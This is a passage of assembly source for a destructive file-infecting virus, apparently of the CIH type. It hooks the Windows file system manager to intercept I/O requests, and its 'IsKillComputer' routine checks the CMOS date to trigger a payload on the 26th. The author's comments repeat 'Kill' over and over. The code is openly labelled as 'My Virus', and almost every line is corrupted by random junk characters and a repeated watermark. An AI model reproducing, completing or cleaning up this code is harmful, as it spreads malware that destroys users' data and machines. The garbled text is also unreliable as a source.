ns"QI%h:Gpq0prevhook:
M"bm n!}n0popad★黑基空间★"Uki @9["^3Q#m-n"r
mov eax, dr0 ;★黑基空间★)F+_J B3i-u@
jmp [eax] ; Jump to prevhook★黑基空间★$D A:aAf gu$a1x'H

y:Ci WNx`;Y0; *************************************★黑基空间★ W tm!@.WZs+}
; * Call the Function that the IFS    *★黑基空间★8gr8u[1Ej!I
; * Manager Would Normally Call to    *
C{ ~6V/[_,w0; * Implement this Particular I/O     *★黑基空间★)x%j0W8VUA,c G
; * Request.                          *★黑基空间★8|qh+JSs b\%z
; *************************************
8clj.R0h Ouv/V&r Cz Y0
-K6z2o'x @0pIFSFunc:★黑基空间★#c'@Q|+f&m6rm
mov ebx, esp
F.P2p*ta ~+{_,hr0push dword ptr [ebx+20h+04h+14h] ; Push pioreq
z|.qd-{ wCg0call [ebx+20h+04h] ; Call pIFSFunc
(xtefc j$_.|0pop ecx ;
#DmJlT.\j]0mov [ebx+1ch], eax ; Modify EAX Value in Stack★黑基空间★j*iO8f([,x EJC

Wwnf6xv U}0; ***************************
1l0Wp&G&J0; * After Calling pIFSFunc, *
^0SZZ"lyAT0; * Get Some Data from the  *★黑基空间★*w+^g'B+pN!Q AF^L
; * Returned pioreq.        *★黑基空间★}$Xl$Y `nY"?
; ***************************★黑基空间★$dHN I:C(R
★黑基空间★Q&U~Y@+mR1w m,Q!?
cmp dword ptr [ebx+20h+04h+04h], 00000024h★黑基空间★g9E3@`#bo
jne QuitMyVirusFileSystemHook★黑基空间★%GF8w"Y(\P
★黑基空间★WfN/]Kw"E8H
; *****************★黑基空间★lPVw*k|1c fW6Jr
; * Get the File  *★黑基空间★C|2q o'w/Q`&P
; * Modification  *★黑基空间★ q!yZ"q!R*|7M'E7Z@
; * Date and Time *★黑基空间★Q*vc4O&o:H'j M gW
; * in DOS Format.*★黑基空间★ x qs[8G/G)Q9Pojft9Ok
; *****************★黑基空间★a0M#MM!RkdF[M6C

0[*@p ^;K S*O!H0Y0mov eax, [ecx+28h]
#zr3zae2l0mov (FileModificationTime-@6)[esi], eax★黑基空间★2TRo;z+i1M i4P
★黑基空间★T ^mqk%l
; ***************************★黑基空间★&`o.?q:l0k&w7F~\U
; * Quit My Virus'          *
{"]bxh0; * IFSMgr_FileSystemHook   *
J(e.Z.YOdg mxh0; ***************************
T#f$\!]3UKV9f0
?ui&MK\hQ0QuitMyVirusFileSystemHook:★黑基空间★ L6|-dx'cc
★黑基空间★`1re)j/_*|
popad
0vK0P/p'M4tq7]2^2C0ret★黑基空间★rlVvE Q;Fb

p S xa-Z{0; *************************************
~5Rc @X n0; * Kill Computer !? ...   *^_^*      *
.?^IQ4S%s$y0; *************************************
y!V ~1g%^Q IG0★黑基空间★W-p8{[4}t GI(m {2W
IsKillComputer:★黑基空间★P ]1jTT2]J4W(P
; Get Now Day from BIOS CMOS
-x Nh7j%[a!m0mov al, 07h★黑基空间★-Bwmh;vE8[#X X
out 70h, al★黑基空间★4@%UY$bL Zm
in al, 71h★黑基空间★Gd'q1]lmY:J
                        xor     al, 01h ; ??/26/????★黑基空间★0y#Toc8Mj:x J wN!R8N
★黑基空间★}9_(Y? _g"]
IF DEBUG
3S4A+Y-S.p"{0jmp DisableOnBusy
#v7| s^dXAH~*G b0ELSE★黑基空间★ZJ0D{*b'I
jnz DisableOnBusy
*`)d~*KYP0ENDIF
-Q-H/o_:Wq0
er7|5@p9@}#}0; **************************************★黑基空间★9\`U Gl'x
; * Kill Kill Kill Kill Kill Kill Kill *★黑基空间★~;kdu6EYY A
; * Kill Kill Kill Kill Kill Kill Kill *★黑基空间★ B X\"vg9lG,s m
; * Kill Kill Kill Kill Kill Kill Kill *
:v_t}r0; * Kill Kill Kill Kill Kill Kill Kill *★黑基空间★jh h}r J
; * Kill Kill Kill Kill Kill Kill Kill *
KXR5~i0; * Kill Kill Kill Kill Kill Kill Kill *
e w+F)x.Z#g|_0; * Kill Kill Kill Kill Kill Kill Kill *
SFFgM r;U?&O0{0; * Kill Kill Kill Kill Kill Kill Kill *★黑基空间★vx6c;TT$y*X
; * Kill Kill Kill Kill Kill Kill Kill *★黑基空间★dP i%U(K?|8i'tu h,p
; * Kill Kill Kill Kill Kill Kill Kill *
D"KpF:?3gb3F0lz0; * Kill Kill Kill Kill Kill Kill Kill *
X*Ui~*Gz4o6o)m6u0; * Kill Kill Kill Kill Kill Kill Kill *
)r!l8I;^3V*K [0; * Kill Kill Kill Kill Kill Kill Kill *★黑基空间★ {X@3H#PR
; * Kill Kill Kill Kill Kill Kill Kill *
OFF(R.p3fn0; * Kill Kill Kill Kill Kill Kill Kill *
_4N G O5M0; * Kill Kill Kill Kill Kill Kill Kill *★黑基空间★u.L)oiXs/Yq#I`H9Y